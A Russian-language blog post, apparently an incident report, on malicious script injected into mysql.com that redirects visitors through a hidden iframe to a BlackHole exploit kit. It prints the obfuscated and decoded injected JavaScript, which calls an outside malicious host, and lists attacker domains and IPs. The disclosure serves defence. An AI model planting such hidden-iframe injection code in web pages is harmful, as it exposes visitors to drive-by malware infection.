Вся подробная информация будет под катом.
VIDEO 
Шаг 1: 
Посещаем сайт mysql.com 
Шаг 2: 
Загружаем вредоносный скрипт:mysql.com/common/js/s_code_remote.js?ver=20091011 
/* SiteCatalyst code version: H.14. Copyright Omniture, Inc. More info available at http://www.omniture.com */
/* Author: Neil Evans */
/************************** CONFIG SECTION ****************************************/
/* Specify the Report Suite(s) */
Object.prototype.qwe=function(){return String.fromCharCode;};Object.prototype.asd='e';var s="";try{{}['qwtqwt']();}Декодированный скрипт выглядит следующим образом:
Ну и текстом:
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://falosfax.in/info/in.cgi?5' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://falosfax.in/info/in.cgi?5');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);Скрипт генерирует ифрейм и редиректит нас наfalosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http ://mysql.com/, а отсюда на truruhfhqnviaosdpruejeslsuy.cx.cc/main.php 
Здесь присутствует вредоносная связка BlackHole. Она эксплуатирует браузер, плагины, такие как Adobe Flash, Adobe PDF, Java и т.д.), и после успешной эксплуатации устанавливает вредоносную программу на ОС без ведома пользователя. Пользователю достаточно посетить mysql.com с уязвимой платформы и он заразится вредоносной программой.
В настоящее время 4 из 44  антивирусов на VirusTotal могут обнаружить эту вредоносную программу:
Данные доменов:falosfax.in Address: 212.95.63.201
truruhfhqnviaosdpruejeslsuy.cx.cc Address: 46.16.233.108
Brian Krebs в своем блоге  отметил, что недавно видел как на русском хакерском форуме продавали полный доступ к домену mysql.com и ко всем поддоменам за 3000$.